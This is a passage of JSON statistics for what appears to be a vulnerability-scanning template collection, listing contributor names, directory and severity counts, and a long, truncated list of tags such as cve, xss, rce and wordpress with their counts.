(brainfork)","count":2},{"name":"raesene","count":2},{"name":"supras","count":2},{"name":"ajaysenr","count":2},{"name":"bp0lr","count":2},{"name":"randomdhiraj","count":2},{"name":"0xnirvana","count":2},{"name":"hackerarpan","count":2},{"name":"geekby","count":2},{"name":"666asd","count":2},{"name":"dbrwsky","count":2},{"name":"nuk3s3c","count":2},{"name":"danielmofer","count":2},{"name":"socketz","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"parth","count":2},{"name":"wa1tf0rme","count":2},{"name":"nielsing","count":1},{"name":"udyz","count":1},{"name":"kailashbohara","count":1},{"name":"booboohq","count":1},{"name":"sicksec","count":1},{"name":"1nf1n7y","count":1},{"name":"supr4s","count":1},{"name":"akshansh","count":1},{"name":"justmumu","count":1},{"name":"nobody","count":1},{"name":"daviey","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ooooooo_q","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"p-l-","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ayadim","count":1},{"name":"breno_css","count":1},{"name":"iphantasmic","count":1},{"name":"makyotox","count":1},{"name":"jonathanwalker","count":1},{"name":"ramkrishna sawant","count":1},{"name":"luqman","count":1},{"name":"paper-pen","count":1},{"name":"shivampand3y","count":1},{"name":"couskito","count":1},{"name":"myst7ic","count":1},{"name":"allenwest24","count":1},{"name":"alperenkesk","count":1},{"name":"unkl4b","count":1},{"name":"bartu utku sarp","count":1},{"name":"blckraven","count":1},{"name":"fq_hsu","count":1},{"name":"toufik-airane","count":1},{"name":"ggranjus","count":1},{"name":"sshell","count":1},{"name":"ola456","count":1},{"name":"retr02332","count":1},{"name":"shiva (strobes security)","count":1},{"name":"j33n1k4","count":1},{"name":"hanlaomo","count":1},{"name":"manuelbua","count":1},{"name":"yashgoti","count":1},{"name":"b4uh0lz","count":1},{"name":"dale clarke","count":1},{"name":"shreyapohekar","count":1},{"name":"hexcat","count":1},{"name":"queencitycyber","count":1},{"name":"r3nz0","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"jna1","count":1},{"name":"lethargynavigator","count":1},{"name":"revblock","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"akokonunes","count":1},{"name":"udinchan","count":1},{"name":"arjunchandarana","count":1},{"name":"y0no","count":1},{"name":"brabbit10","count":1},{"name":"dk999","count":1},{"name":"zeyad azima","count":1},{"name":"colbyjack1134","count":1},{"name":"absshax","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"realexp3rt","count":1},{"name":"schniggie","count":1},{"name":"0h1in9e","count":1},{"name":"miroslavsotak","count":1},{"name":"s1r1u5_","count":1},{"name":"mukundbhuva","count":1},{"name":"metascan","count":1},{"name":"zinminphy0","count":1},{"name":"aringo","count":1},{"name":"open-sec","count":1},{"name":"httpvoid","count":1},{"name":"marcos_iaf","count":1},{"name":"vinit989","count":1},{"name":"infosecsanyam","count":1},{"name":"naglis","count":1},{"name":"iampritam","count":1},{"name":"majidmc2","count":1},{"name":"act1on3","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"andirrahmani1","count":1},{"name":"kaizensecurity","count":1},{"name":"omarjezi","count":1},{"name":"stupidfish","count":1},{"name":"erethon","count":1},{"name":"ringo","count":1},{"name":"ph33rr","count":1},{"name":"noamrathaus","count":1},{"name":"jbaines-r7","count":1},{"name":"galoget","count":1},{"name":"jrolf","count":1},{"name":"elder tao","count":1},{"name":"evolutionsec","count":1},{"name":"pry0cc","count":1},{"name":"hazana","count":1},{"name":"vicrack","count":1},{"name":"d0rkerdevil","count":1},{"name":"carlosvieira","count":1},{"name":"0xtavian","count":1},{"name":"secthebit","count":1},{"name":"vzamanillo","count":1},{"name":"whynotke","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"xshuden","count":1},{"name":"cookiehanhoan","count":1},{"name":"topscoder","count":1},{"name":"micha3lb3n","count":1},{"name":"igibanez","count":1},{"name":"2rs3c","count":1},{"name":"philippdelteil","count":1},{"name":"f1she3","count":1},{"name":"failopen","count":1},{"name":"0xceeb","count":1},{"name":"arr0way","count":1},{"name":"therealtoastycat","count":1},{"name":"sec_hawk","count":1},{"name":"fopina","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"jas37","count":1},{"name":"zandros0","count":1},{"name":"yashanand155","count":1},{"name":"affix","count":1},{"name":"pudsec","count":1},{"name":"skylark-lab","count":1},{"name":"x6263","count":1},{"name":"marcio mendes","count":1},{"name":"ipanda","count":1},{"name":"gboddin","count":1},{"name":"willd96","count":1},{"name":"nytr0gen","count":1},{"name":"dawid-czarnecki","count":1},{"name":"luqmaan hadia","count":1},{"name":"harshinsecurity","count":1},{"name":"calumjelrick","count":1},{"name":"amanrawat","count":1},{"name":"0xrod","count":1},{"name":"pdp","count":1},{"name":"ndmalc","count":1},{"name":"_harleo","count":1},{"name":"kurohost","count":1},{"name":"un-fmunozs","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"pratik khalane","count":1},{"name":"am0nt31r0","count":1},{"name":"exid","count":1},{"name":"ayadi","count":1},{"name":"ofjaaah","count":1},{"name":"bughuntersurya","count":1},{"name":"thevillagehacker","count":1},{"name":"adrianmf","count":1},{"name":"sherlocksecurity","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"flag007","count":1},{"name":"wlayzz","count":1},{"name":"mr. bobo hp","count":1},{"name":"pascalheidmann","count":1},{"name":"juliosmelo","count":1},{"name":"daffianfo","count":1},{"name":"borna nematzadeh","count":1},{"name":"furkansenan","count":1},{"name":"furkansayim","count":1},{"name":"tarunkoyalwar","count":1},{"name":"tirtha","count":1},{"name":"sak1","count":1},{"name":"hakluke","count":1},{"name":"amnotacat","count":1},{"name":"dhiyaneshdki","count":1},{"name":"patralos","count":1},{"name":"shockwave","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"elmahdi","count":1},{"name":"0xd0ff9","count":1},{"name":"rotembar","count":1},{"name":"hakimkt","count":1},{"name":"lixts","count":1},{"name":"bhutch","count":1},{"name":"notsoevilweasel","count":1},{"name":"kabirsuda","count":1},{"name":"nerrorsec","count":1},{"name":"miryangjung","count":1},{"name":"hczdmr","count":1},{"name":"natto97","count":1},{"name":"rojanrijal","count":1},{"name":"francescocarlucci","count":1},{"name":"zsusac","count":1},{"name":"exceed","count":1},{"name":"dwbzn","count":1},{"name":"davidfegyver","count":1},{"name":"kchason","count":1},{"name":"alevsk","count":1},{"name":"alex","count":1},{"name":"dievus","count":1},{"name":"zy9ard3","count":1},{"name":"deena","count":1},{"name":"shifacyclewla","count":1},{"name":"lingtren","count":1},{"name":"5up3r541y4n","count":1},{"name":"pjborah","count":1},{"name":"jaimin gondaliya","count":1},{"name":"sickwell","count":1},{"name":"phyr3wall","count":1},{"name":"tea","count":1},{"name":"screamy","count":1},{"name":"ohlinge","count":1},{"name":"co0nan","count":1},{"name":"aaronchen0","count":1},{"name":"mesaglio","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jc175","count":1},{"name":"barthy.koeln","count":1},{"name":"chron0x","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"push4d","count":1},{"name":"higor melgaço","count":1},{"name":"ahmed abou-ela","count":1},{"name":"lrtk-coder","count":1},{"name":"elouhi","count":1},{"name":"thelicato","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mass0ma","count":1},{"name":"opencirt","count":1},{"name":"mariam tariq","count":1},{"name":"mihhailsokolov","count":1},{"name":"apt-mirror","count":1},{"name":"intx0x80","count":1},{"name":"viniciuspereiras","count":1},{"name":"viondexd","count":1},{"name":"qlkwej","count":1},{"name":"tim_koopmans","count":1},{"name":"remonsec","count":1},{"name":"jbertman","count":1},{"name":"dali","count":1},{"name":"ahmetpergamum","count":1},{"name":"mubassirpatel","count":1},{"name":"jeya.seelan","count":1},{"name":"dabla","count":1},{"name":"hardik-rathod","count":1},{"name":"clment cruchet","count":1},{"name":"knassar702","count":1},{"name":"unp4ck","count":1},{"name":"bad5ect0r","count":1},{"name":"regala_","count":1},{"name":"ling","count":1},{"name":"akash.c","count":1},{"name":"rubina119","count":1},{"name":"manasmbellani","count":1},{"name":"florianmaak","count":1},{"name":"piyushchhiroliya","count":1},{"name":"noobexploiter","count":1},{"name":"bjhulst","count":1},{"name":"michael wedl","count":1},{"name":"omarkurt","count":1},{"name":"mhdsamx","count":1},{"name":"sleepingbag945","count":1},{"name":"mah3sec_","count":1},{"name":"0xh7ml","count":1},{"name":"imhunterand","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"lark lab","count":1},{"name":"gtrrnr","count":1},{"name":"ptonewreckin","count":1},{"name":"esonhugh","count":1},{"name":"thebinitghimire","count":1},{"name":"jub0bs","count":1},{"name":"retr0","count":1},{"name":"petergrifin","count":1},{"name":"official_blackhat13","count":1},{"name":"osamahamad","count":1},{"name":"petruknisme","count":1},{"name":"houdinis","count":1},{"name":"droberson","count":1},{"name":"ransomsec","count":1},{"name":"bywalks","count":1},{"name":"jeya seelan","count":1},{"name":"jteles","count":1},{"name":"narluin","count":1},{"name":"orpheus","count":1},{"name":"jiheon-dev","count":1},{"name":"compr00t","count":1},{"name":"0xceba","count":1},{"name":"ynnirc","count":1},{"name":"duty_1g","count":1},{"name":"xstp","count":1},{"name":"yuansec","count":1},{"name":"charanrayudu","count":1},{"name":"jcockhren","count":1},{"name":"juicypotato1","count":1},{"name":"xcapri","count":1},{"name":"kiks7","count":1},{"name":"husain","count":1},{"name":"ahmed sherif","count":1},{"name":"kagamigawa","count":1},{"name":"ldionmarcil","count":1},{"name":"aayush vishnoi","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"rodnt","count":1},{"name":"ramondunker","count":1},{"name":"noraj","count":1},{"name":"spac3wh1te","count":1},{"name":"becivells","count":1},{"name":"kareemse1im","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"rotemreiss","count":1},{"name":"fmunozs","count":1},{"name":"lamscun","count":1},{"name":"caon","count":1},{"name":"freakyclown","count":1},{"name":"soyelmago","count":1},{"name":"tehtbl","count":1},{"name":"arall","count":1},{"name":"aresx","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"b0yd","count":1},{"name":"rschio","count":1},{"name":"wabafet","count":1},{"name":"dmartyn","count":1},{"name":"b0rn2r00t","count":1},{"name":"af001","count":1},{"name":"andysvints","count":1},{"name":"mrcl0wnlab","count":1},{"name":"ok_bye_now","count":1},{"name":"alexrydzak","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"shiar","count":1},{"name":"liquidsec","count":1},{"name":"jaskaran","count":1},{"name":"izn0u","count":1},{"name":"anon-artist","count":1},{"name":"luskabol","count":1},{"name":"kr1shna4garwal","count":1},{"name":"nagli","count":1},{"name":"8authur","count":1},{"name":"oscarintherocks","count":1},{"name":"aron molnar","count":1},{"name":"h4kux","count":1},{"name":"zhenwarx","count":1},{"name":"djoevanka","count":1},{"name":"bugvsme","count":1},{"name":"evan rubinstien","count":1},{"name":"undefl0w","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"kiransau","count":1},{"name":"patrick pirker","count":1},{"name":"elitebaz","count":1},{"name":"_c0wb0y_","count":1},{"name":"tirtha_mandal","count":1},{"name":"rivalsec","count":1},{"name":"momen eldawakhly","count":1},{"name":"w0tx","count":1},{"name":"berkdusunur","count":1},{"name":"0xteles","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"th3r4id","count":1},{"name":"danigoland","count":1},{"name":"mbmy","count":1},{"name":"xeldax","count":1},{"name":"mantissts","count":1}],"directory":[{"name":"http","count":5860},{"name":"workflows","count":190},{"name":"file","count":123},{"name":"network","count":93},{"name":"dns","count":18},{"name":"ssl","count":12},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":2857},{"name":"high","count":1270},{"name":"medium","count":1042},{"name":"critical","count":704},{"name":"low","count":216},{"name":"unknown","count":26}],"types":[{"name":"file","count":123},{"name":"dns","count":18}]} +{"tags":[{"name":"cve","count":1882},{"name":"panel","count":904},{"name":"wordpress","count":785},{"name":"exposure","count":689},{"name":"wp-plugin","count":676},{"name":"osint","count":652},{"name":"xss","count":648},{"name":"tech","count":612},{"name":"edb","count":597},{"name":"lfi","count":551},{"name":"cve2021","count":433},{"name":"rce","count":421},{"name":"cve2022","count":400},{"name":"packetstorm","count":369},{"name":"wpscan","count":348},{"name":"misconfig","count":302},{"name":"wp","count":290},{"name":"unauth","count":268},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"osint-social","count":207},{"name":"top-200","count":207},{"name":"kev","count":200},{"name":"sqli","count":199},{"name":"authenticated","count":196},{"name":"","count":194},{"name":"config","count":193},{"name":"oast","count":166},{"name":"token","count":157},{"name":"apache","count":151},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":148},{"name":"default-login","count":147},{"name":"joomla","count":136},{"name":"file","count":128},{"name":"login","count":125},{"name":"redirect","count":114},{"name":"cve2010","count":112},{"name":"files","count":100},{"name":"top-100","count":100},{"name":"router","count":97},{"name":"cms","count":95},{"name":"network","count":94},{"name":"ssrf","count":94},{"name":"auth-bypass","count":79},{"name":"cve2017","count":77},{"name":"devops","count":77},{"name":"cve2023","count":76},{"name":"takeover","count":73},{"name":"intrusive","count":69},{"name":"install","count":69},{"name":"disclosure","count":66},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"google","count":53},{"name":"cisco","count":53},{"name":"cve2016","count":52},{"name":"adobe","count":50},{"name":"fileupload","count":49},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"detect","count":45},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"atlassian","count":44},{"name":"vulhub","count":44},{"name":"aem","count":44},{"name":"plugin","count":43},{"name":"vmware","count":43},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"cve2014","count":42},{"name":"osint-porn","count":42},{"name":"huntr","count":40},{"name":"traversal","count":37},{"name":"generic","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"osint-misc","count":35},{"name":"kubernetes","count":35},{"name":"injection","count":34},{"name":"aws","count":33},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"sap","count":29},{"name":"osint-coding","count":29},{"name":"log4j","count":28},{"name":"osint-tech","count":28},{"name":"cnvd","count":27},{"name":"gitlab","count":27},{"name":"microsoft","count":26},{"name":"misc","count":26},{"name":"proxy","count":25},{"name":"fuzz","count":25},{"name":"jndi","count":25},{"name":"php","count":25},{"name":"manageengine","count":24},{"name":"osint-shopping","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"api","count":24},{"name":"osint-business","count":24},{"name":"osint-images","count":24},{"name":"cve2012","count":23},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"zoho","count":23},{"name":"wp-theme","count":22},{"name":"weblogic","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":21},{"name":"msf","count":21},{"name":"c2","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"github","count":19},{"name":"dns","count":19},{"name":"jenkins","count":19},{"name":"dlink","count":19},{"name":"camera","count":19},{"name":"ssl","count":19},{"name":"struts","count":19},{"name":"service","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"ftp","count":18},{"name":"ir","count":17},{"name":"lfr","count":17},{"name":"cve2011","count":17},{"name":"admin","count":17},{"name":"backup","count":16},{"name":"cve2009","count":16},{"name":"printer","count":16},{"name":"nginx","count":16},{"name":"osint-blog","count":16},{"name":"xxe","count":16},{"name":"status","count":15},{"name":"android","count":15},{"name":"hp","count":15},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"osint-health","count":14},{"name":"citrix","count":14},{"name":"jboss","count":14},{"name":"zyxel","count":14},{"name":"domainmod","count":14},{"name":"osint-art","count":14},{"name":"woocommerce","count":14},{"name":"java","count":14},{"name":"confluence","count":14},{"name":"mail","count":14},{"name":"cve2013","count":14},{"name":"audit","count":14},{"name":"cuppa","count":13},{"name":"login-check","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"osint-dating","count":13},{"name":"azure","count":13},{"name":"osint-political","count":13},{"name":"creds-stuffing","count":13},{"name":"fortigate","count":13},{"name":"grafana","count":12},{"name":"drupal","count":12},{"name":"vpn","count":12},{"name":"graphql","count":12},{"name":"rails","count":12},{"name":"webserver","count":12},{"name":"netgear","count":12},{"name":"microweber","count":12},{"name":"dashboard","count":12},{"name":"ruijie","count":12},{"name":"git","count":12},{"name":"airflow","count":12},{"name":"auth","count":12},{"name":"ruby","count":12},{"name":"kafka","count":12},{"name":"backdoor","count":12},{"name":"netsweeper","count":12},{"name":"docker","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"osint-video","count":11},{"name":"enum","count":11},{"name":"coldfusion","count":11},{"name":"npm","count":11},{"name":"cisa","count":11},{"name":"online-fire-reporting","count":11},{"name":"phpmyadmin","count":11},{"name":"cnvd2021","count":11},{"name":"spring","count":10},{"name":"ssh","count":10},{"name":"zimbra","count":10},{"name":"django","count":10},{"name":"dedecms","count":10},{"name":"dell","count":10},{"name":"symfony","count":10},{"name":"jolokia","count":10},{"name":"sonicwall","count":10},{"name":"ssti","count":10},{"name":"digitalocean","count":10},{"name":"glpi","count":10},{"name":"solarview","count":10},{"name":"headless","count":10},{"name":"prometheus","count":9},{"name":"scada","count":9},{"name":"osint-news","count":9},{"name":"thinkphp","count":9},{"name":"gitea","count":9},{"name":"installer","count":9},{"name":"wso2","count":9},{"name":"opencats","count":9},{"name":"windows","count":9},{"name":"sitecore","count":9},{"name":"fastjson","count":9},{"name":"zabbix","count":9},{"name":"cache","count":9},{"name":"firebase","count":9},{"name":"pfsense","count":9},{"name":"bypass","count":9},{"name":"iis","count":9},{"name":"redis","count":9},{"name":"vcenter","count":9},{"name":"kube","count":9},{"name":"versa","count":9},{"name":"console","count":8},{"name":"recon","count":8},{"name":"emerge","count":8},{"name":"ognl","count":8},{"name":"ecology","count":8},{"name":"default-page","count":8},{"name":"spotweb","count":8},{"name":"jetbrains","count":8},{"name":"bucket","count":8},{"name":"elasticsearch","count":8},{"name":"cisco-switch","count":8},{"name":"oauth","count":8},{"name":"smtp","count":8},{"name":"hms","count":8},{"name":"unauthenticated","count":8},{"name":"icewarp","count":8},{"name":"mirai","count":8},{"name":"crlf","count":8},{"name":"atom","count":8},{"name":"metadata","count":8},{"name":"db","count":8},{"name":"cnvd2020","count":8},{"name":"druid","count":8},{"name":"exchange","count":8},{"name":"config-audit","count":8},{"name":"solr","count":8},{"name":"nodejs","count":7},{"name":"nagiosxi","count":7},{"name":"sophos","count":7},{"name":"maps","count":7},{"name":"ofbiz","count":7},{"name":"samsung","count":7},{"name":"squirrelmail","count":7},{"name":"seeyon","count":7},{"name":"malware","count":7},{"name":"go","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"avtech","count":7},{"name":"gogs","count":7},{"name":"shopify","count":7},{"name":"nagios","count":7},{"name":"vbulletin","count":7},{"name":"manager","count":7},{"name":"huawei","count":7},{"name":"websphere","count":7},{"name":"fortios","count":7},{"name":"liferay","count":6},{"name":"fpd","count":6},{"name":"plesk","count":6},{"name":"magmi","count":6},{"name":"nexus","count":6},{"name":"kubelet","count":6},{"name":"activemq","count":6},{"name":"jetty","count":6},{"name":"openvpn","count":6},{"name":"symantec","count":6},{"name":"moodle","count":6},{"name":"leak","count":6},{"name":"mongodb","count":6},{"name":"vms","count":6},{"name":"zhiyuan","count":6},{"name":"keycloak","count":6},{"name":"node","count":6},{"name":"solarwinds","count":6},{"name":"elfinder","count":6},{"name":"s3","count":6},{"name":"bigip","count":6},{"name":"odoo","count":6},{"name":"jamf","count":6},{"name":"pmb","count":6},{"name":"doctor-appointment-system","count":6},{"name":"artica","count":6},{"name":"minio","count":6},{"name":"slack","count":6},{"name":"error","count":6},{"name":"lucee","count":6},{"name":"filemanager","count":6},{"name":"cobbler","count":6},{"name":"newrelic","count":6},{"name":"rconfig","count":6},{"name":"python","count":6},{"name":"opensis","count":6},{"name":"microstrategy","count":6},{"name":"geoserver","count":5},{"name":"hashicorp","count":5},{"name":"gocd","count":5},{"name":"square","count":5},{"name":"nacos","count":5},{"name":"facebook","count":5},{"name":"alibaba","count":5},{"name":"metinfo","count":5},{"name":"74cms","count":5},{"name":"circarlife","count":5},{"name":"cockpit","count":5},{"name":"firmware","count":5},{"name":"parallels","count":5},{"name":"avaya","count":5},{"name":"resin","count":5},{"name":"database","count":5},{"name":"storage","count":5},{"name":"sql","count":5},{"name":"avideo","count":5},{"name":"adminer","count":5},{"name":"cacti","count":5},{"name":"vrealize","count":5},{"name":"rfi","count":5},{"name":"typo3","count":5},{"name":"tikiwiki","count":5},{"name":"prestashop","count":5},{"name":"elastic","count":5},{"name":"strapi","count":5},{"name":"caucho","count":5},{"name":"awstats","count":5},{"name":"fatpipe","count":5},{"name":"apisix","count":5},{"name":"microfocus","count":5},{"name":"carrental","count":5},{"name":"hybris","count":5},{"name":"openemr","count":5},{"name":"paypal","count":5},{"name":"heroku","count":5},{"name":"ruckus","count":5},{"name":"rseenet","count":5},{"name":"akamai","count":5},{"name":"postmessage","count":4},{"name":"prtg","count":4},{"name":"mostra","count":4},{"name":"kentico","count":4},{"name":"thinkcmf","count":4},{"name":"flink","count":4},{"name":"centos","count":4},{"name":"horde","count":4},{"name":"mailchimp","count":4},{"name":"candidats","count":4},{"name":"jupyter","count":4},{"name":"redmine","count":4},{"name":"froxlor","count":4},{"name":"pentaho","count":4},{"name":"kevinlab","count":4},{"name":"zend","count":4},{"name":"roxy","count":4},{"name":"zte","count":4},{"name":"httpd","count":4},{"name":"mlflow","count":4},{"name":"cve2007","count":4},{"name":"rabbitmq","count":4},{"name":"couchdb","count":4},{"name":"nosqli","count":4},{"name":"powerjob","count":4},{"name":"webmin","count":4},{"name":"tenda","count":4},{"name":"mostracms","count":4},{"name":"beyondtrust","count":4},{"name":"age-encryption","count":4},{"name":"cloudflare","count":4},{"name":"hikvision","count":4},{"name":"log","count":4},{"name":"pixie","count":4},{"name":"photo","count":4},{"name":"bitbucket","count":4},{"name":"telesquare","count":4},{"name":"hongdian","count":4},{"name":"pie-register","count":4},{"name":"oa","count":4},{"name":"springcloud","count":4},{"name":"artifactory","count":4},{"name":"arcgis","count":4},{"name":"tokens","count":4},{"name":"aura","count":4},{"name":"xmlrpc","count":4},{"name":"seagate","count":4},{"name":"voip","count":4},{"name":"mysql","count":4},{"name":"newstatpress","count":4},{"name":"dolibarr","count":4},{"name":"telerik","count":4},{"name":"wcs","count":4},{"name":"openfire","count":4},{"name":"terramaster","count":4},{"name":"royalevent","count":4},{"name":"sangfor","count":4},{"name":"ebs","count":4},{"name":"yeswiki","count":4},{"name":"mautic","count":4},{"name":"javascript","count":4},{"name":"ems","count":4},{"name":"ampache","count":4},{"name":"dropbear","count":4},{"name":"mikrotik","count":4},{"name":"server","count":4},{"name":"bmc","count":4},{"name":"goanywhere","count":4},{"name":"jellyfin","count":4},{"name":"ldap","count":4},{"name":"axigen","count":4},{"name":"phppgadmin","count":4},{"name":"gnuboard","count":4},{"name":"nextjs","count":4},{"name":"linkerd","count":4},{"name":"sendgrid","count":4},{"name":"umbraco","count":4},{"name":"hpe","count":4},{"name":"aspose","count":4},{"name":"phpinfo","count":4},{"name":"cnvd2019","count":4},{"name":"cve2005","count":4},{"name":"hoteldruid","count":4},{"name":"puppet","count":4},{"name":"concrete","count":4},{"name":"elementor","count":4},{"name":"tls","count":4},{"name":"search","count":4},{"name":"consul","count":4},{"name":"osint-archived","count":4},{"name":"spark","count":4},{"name":"kibana","count":4},{"name":"panos","count":4},{"name":"httpserver","count":4},{"name":"asp","count":4},{"name":"sonarqube","count":4},{"name":"stripe","count":4},{"name":"sharepoint","count":3},{"name":"hsphere","count":3},{"name":"nuget","count":3},{"name":"wordfence","count":3},{"name":"linux","count":3},{"name":"kavita","count":3},{"name":"gateway","count":3},{"name":"webadmin","count":3},{"name":"ansible","count":3},{"name":"rancher","count":3},{"name":"movable","count":3},{"name":"kkfileview","count":3},{"name":"selea","count":3},{"name":"nuxtjs","count":3},{"name":"cluster","count":3},{"name":"saltstack","count":3},{"name":"chamilo","count":3},{"name":"voipmonitor","count":3},{"name":"mobileiron","count":3},{"name":"bruteforce","count":3},{"name":"yonyou","count":3},{"name":"pypi","count":3},{"name":"monstra","count":3},{"name":"swagger","count":3},{"name":"kfm","count":3},{"name":"thruk","count":3},{"name":"nortek","count":3},{"name":"3cx","count":3},{"name":"postman","count":3},{"name":"splunk","count":3},{"name":"processwire","count":3},{"name":"intercom","count":3},{"name":"netdata","count":3},{"name":"telnet","count":3},{"name":"pip","count":3},{"name":"carel","count":3},{"name":"ivanti","count":3},{"name":"rackn","count":3},{"name":"mcafee","count":3},{"name":"empirecms","count":3},{"name":"harbor","count":3},{"name":"globalprotect","count":3},{"name":"thinfinity","count":3},{"name":"forum","count":3},{"name":"telegram","count":3},{"name":"dreambox","count":3},{"name":"qnap","count":3},{"name":"matrix","count":3},{"name":"smb","count":3},{"name":"panabit","count":3},{"name":"sysaid","count":3},{"name":"redash","count":3},{"name":"samba","count":3},{"name":"rubygems","count":3},{"name":"apollo","count":3},{"name":"rlm","count":3},{"name":"getsimple","count":3},{"name":"payara","count":3},{"name":"securepoint","count":3},{"name":"ueditor","count":3},{"name":"openbmcs","count":3},{"name":"webmail","count":3},{"name":"r-seenet","count":3},{"name":"pega","count":3},{"name":"glassfish","count":3},{"name":"grav","count":3},{"name":"graylog","count":3},{"name":"lighttpd","count":3},{"name":"superadmin","count":3},{"name":"upload","count":3},{"name":"modem","count":3},{"name":"labkey","count":3},{"name":"digitalrebar","count":3},{"name":"zeroshell","count":3},{"name":"purchase-order","count":3},{"name":"sftp","count":3},{"name":"listserv","count":3},{"name":"sony","count":3},{"name":"kingsoft","count":3},{"name":"wbce","count":3},{"name":"fanwei","count":3},{"name":"mailgun","count":3},{"name":"metersphere","count":3},{"name":"codeigniter","count":3},{"name":"shiro","count":3},{"name":"graph","count":3},{"name":"mantisbt","count":3},{"name":"trixbox","count":3},{"name":"zerof","count":3},{"name":"actuator","count":3},{"name":"proftpd","count":3},{"name":"steve","count":3},{"name":"unifi","count":3},{"name":"fileman","count":3},{"name":"jeecg","count":3},{"name":"fuelcms","count":3},{"name":"asus","count":3},{"name":"jeesns","count":3},{"name":"superset","count":3},{"name":"purchase-order-management-system","count":3},{"name":"ampps","count":3},{"name":"axis2","count":3},{"name":"yii","count":3},{"name":"nuuo","count":3},{"name":"synology","count":3},{"name":"teamcity","count":3},{"name":"gradle","count":3},{"name":"buffalo","count":3},{"name":"dzzoffice","count":3},{"name":"drawio","count":3},{"name":"mongo","count":3},{"name":"dos","count":3},{"name":"openam","count":3},{"name":"clusterengine","count":3},{"name":"netlify","count":3},{"name":"bitrix","count":3},{"name":"totolink","count":3},{"name":"etcd","count":3},{"name":"jfrog","count":3},{"name":"key","count":3},{"name":"aptus","count":3},{"name":"metabase","count":3},{"name":"poms","count":3},{"name":"openai","count":3},{"name":"geowebserver","count":3},{"name":"weiphp","count":3},{"name":"pulsar","count":3},{"name":"octobercms","count":3},{"name":"loytec","count":3},{"name":"dom","count":3},{"name":"webcam","count":3},{"name":"waf","count":3},{"name":"linksys","count":3},{"name":"angular","count":3},{"name":"express","count":3},{"name":"lansweeper","count":3},{"name":"xerox","count":3},{"name":"blockchain","count":3},{"name":"webalizer","count":3},{"name":"discourse","count":3},{"name":"selenium","count":3},{"name":"figma","count":3},{"name":"eshop","count":3},{"name":"httpbin","count":3},{"name":"twitter","count":3},{"name":"trendnet","count":3},{"name":"targa","count":3},{"name":"sugarcrm","count":3},{"name":"servicenow","count":3},{"name":"rocketchat","count":3},{"name":"tableau","count":3},{"name":"bigant","count":3},{"name":"finecms","count":3},{"name":"epson","count":3},{"name":"axway","count":3},{"name":"sentry","count":3},{"name":"axis","count":3},{"name":"password","count":3},{"name":"influxdb","count":3},{"name":"fanruan","count":3},{"name":"dotcms","count":3},{"name":"openstack","count":3},{"name":"backdrop","count":3},{"name":"mapbox","count":3},{"name":"circleci","count":3},{"name":"flexvnf","count":3},{"name":"magnolia","count":3},{"name":"messaging","count":3},{"name":"segment","count":3},{"name":"temenos","count":3},{"name":"subrion","count":3},{"name":"lotus","count":3},{"name":"dlp","count":2},{"name":"kiwitcms","count":2},{"name":"sniplets","count":2},{"name":"aqua","count":2},{"name":"woocommerce-for-japan","count":2},{"name":"spartacus","count":2},{"name":"myfactory","count":2},{"name":"xmpp","count":2},{"name":"chiyu","count":2},{"name":"tasmota","count":2},{"name":"conductor","count":2},{"name":"linkedin","count":2},{"name":"aerohive","count":2},{"name":"ganglia","count":2},{"name":"neos","count":2},{"name":"svn","count":2},{"name":"qihang","count":2},{"name":"owasp","count":2},{"name":"aruba","count":2},{"name":"optimizely","count":2},{"name":"rackstation","count":2},{"name":"loqate","count":2},{"name":"bitly","count":2},{"name":"node-red-dashboard","count":2},{"name":"self-hosted","count":2},{"name":"cassandra","count":2},{"name":"checkpoint","count":2},{"name":"eris","count":2},{"name":"readme","count":2},{"name":"inspur","count":2},{"name":"spider-event-calendar","count":2},{"name":"jeedom","count":2},{"name":"alienvault","count":2},{"name":"traefik"